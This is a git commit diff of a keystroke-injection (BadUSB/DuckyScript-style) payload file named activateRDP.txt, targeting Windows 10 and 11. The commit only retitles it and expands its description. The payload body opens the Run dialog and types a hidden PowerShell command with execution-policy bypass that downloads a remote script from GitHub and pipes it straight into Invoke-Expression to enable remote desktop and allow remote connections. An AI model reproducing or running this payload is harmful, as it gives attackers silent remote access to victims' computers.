Update activateRDP.txt
This commit is contained in:
parent
10440aae89
commit
4046b1795a
1 changed files with 3 additions and 3 deletions
|
@ -1,8 +1,8 @@
|
||||||
REM Title: AcidBurn
|
REM Title: RDP
|
||||||
|
|
||||||
REM Author: UNC0V3R3D
|
REM Author: UNC0V3R3D
|
||||||
|
|
||||||
REM Description: This payload is going to activate remote desktop.
|
REM Description: This payload is going to activate remote desktop and allow remote connections.
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
|
@ -13,4 +13,4 @@ REM ------------------------------------------------------------------------
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex
|
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex
|
||||||
ENTER
|
ENTER
|
||||||
|
|
Loading…
Reference in a new issue